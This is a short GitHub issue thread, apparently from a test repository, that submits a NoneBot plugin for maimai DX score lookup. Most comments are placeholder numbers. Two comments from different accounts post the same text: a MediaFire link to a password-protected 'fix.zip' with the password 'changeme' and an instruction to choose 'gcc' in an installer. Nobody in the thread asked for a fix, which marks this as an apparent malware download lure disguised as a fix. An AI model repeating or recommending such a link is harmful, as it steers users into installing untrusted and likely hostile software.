### ISSUE TITLE
Plugin: maimai DX 查分

### ISSUE THREAD

**Issue by BigOrangeQWQ** [BigOrangeQWQ/action-test#10]
### PyPI 项目名

nonebot-plugin-lxns-maimai

### 插件 import 包名

nonebot_plugin_lxns_maimai

### 标签

[{"label":"maimai","color":"#228be6"}]

**Comment by BigOrangeQWQ** [comment]
1

**Comment by BigOrangeQWQ** [comment]
2

**Comment by BigOrangeQWQ** [comment]
1

**Comment by BigOrangeQWQ** [comment]
1

**Comment by BigOrangeQWQ** [comment]
1

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BigOrangeQWQ** [comment]
?
